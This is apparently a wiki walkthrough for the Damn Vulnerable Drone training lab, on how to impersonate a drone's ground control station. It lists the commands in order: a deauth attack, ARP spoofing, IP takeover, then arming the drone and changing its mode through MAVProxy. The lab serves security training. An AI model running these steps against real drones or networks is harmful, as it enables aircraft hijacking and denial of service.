ARP spoofing the Ground Control Station (GCS) to intercept and control communication between the drone and the GCS.

Damn Vulnerable Drone > Attack Scenarios > Injection > Ground Control ARP Spoofing

Description

ARP spoofing involves sending false ARP (Address Resolution Protocol) messages to a network, associating the attacker's MAC address with the IP address of the target device (the GCS in this case). This allows the attacker to intercept, modify, or block communication to the target device, effectively taking control of the drone's communication.

The goal of this attack is to impersonate the GCS by taking over its IP address after disconnecting the real GCS from the network. Once assumed, the attacker can directly interact with the drone using QGroundControl or MAVProxy.

Resources

⚠️ Solution Guide

Step 1. Initialize the Drone

Power on the drone and ensure it is connected to its WiFi network.

Step 2. Break into the Drone Network

Use WiFi cracking techniques to access the network. See:

Step 3. Deauth the Legitimate GCS

Disconnect the real GCS from the network using a deauth attack:

sudo aireplay-ng --deauth 0 -a <AP_MAC> -c <GCS_MAC> wlan0mon

Step 4. Install QGroundControl (x86_64)

wget https://s3-us-west-2.amazonaws.com/qgroundcontrol/latest/QGroundControl.AppImage
chmod +x QGroundControl.AppImage
./QGroundControl.AppImage

Step 5. Install MAVProxy (ARM/Apple Silicon)

sudo pip install MAVProxy
mavproxy.py

Step 6. Note Your IP Address on the Network

ifconfig wlan0

Step 7. Perform ARP Spoofing

Impersonate the GCS by poisoning the ARP table of the drone:

sudo arpspoof -i wlan0 -t 192.168.13.14 -r 192.168.13.1

Step 8. Set Static GCS IP Address

nmcli connection modify "Drone_Wifi" ipv4.method manual \
ipv4.addresses 192.168.13.14/24 \
ipv4.gateway 192.168.13.1 \
ipv4.dns "8.8.8.8 8.8.4.4"

Step 9. Restart Network Connection

nmcli connection down "Drone_Wifi" && nmcli connection up "Drone_Wifi"

Step 10. Wait for Drone Connection

Once the GCS is spoofed and reconnected, the drone should attempt to link to your machine assuming the GCS role.

Step 11. Control the Drone via QGroundControl (x86_64)

Right-click → "Go To" position
Select "RTL" or "Land" from the mode dropdown

Step 12. Control the Drone via MAVProxy (ARM)

mode GUIDED
arm throttle
rtl, land, etc.

Step 13. Restore Original IP Configuration

nmcli connection modify "Drone_Wifi" ipv4.method manual \
ipv4.addresses 192.168.13.10/24 \
ipv4.gateway 192.168.13.1 \
ipv4.dns "8.8.8.8 8.8.4.4"
nmcli connection down "Drone_Wifi" && nmcli connection up "Drone_Wifi"

Ground Control Station Spoofing - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

Description

Resources

Step 1. Initialize the Drone

Step 2. Break into the Drone Network

Step 3. Deauth the Legitimate GCS

Step 4. Install QGroundControl (x86_64)

Step 5. Install MAVProxy (ARM/Apple Silicon)

Step 6. Note Your IP Address on the Network

Step 7. Perform ARP Spoofing

Step 8. Set Static GCS IP Address

Step 9. Restart Network Connection

Step 10. Wait for Drone Connection

Step 11. Control the Drone via QGroundControl (x86_64)

Step 12. Control the Drone via MAVProxy (ARM)

Step 13. Restore Original IP Configuration

⚠️ GitHub.com Fallback ⚠️

Ground Control Station Spoofing - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki

Description

Resources

Step 1. Initialize the Drone

Step 2. Break into the Drone Network

Step 3. Deauth the Legitimate GCS

Step 4. Install QGroundControl (x86_64)

Step 5. Install MAVProxy (ARM/Apple Silicon)

Step 6. Note Your IP Address on the Network

Step 7. Perform ARP Spoofing

Step 8. Set Static GCS IP Address

Step 9. Restart Network Connection

Step 10. Wait for Drone Connection

Step 11. Control the Drone via QGroundControl (x86_64)

Step 12. Control the Drone via MAVProxy (ARM)

Step 13. Restore Original IP Configuration

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️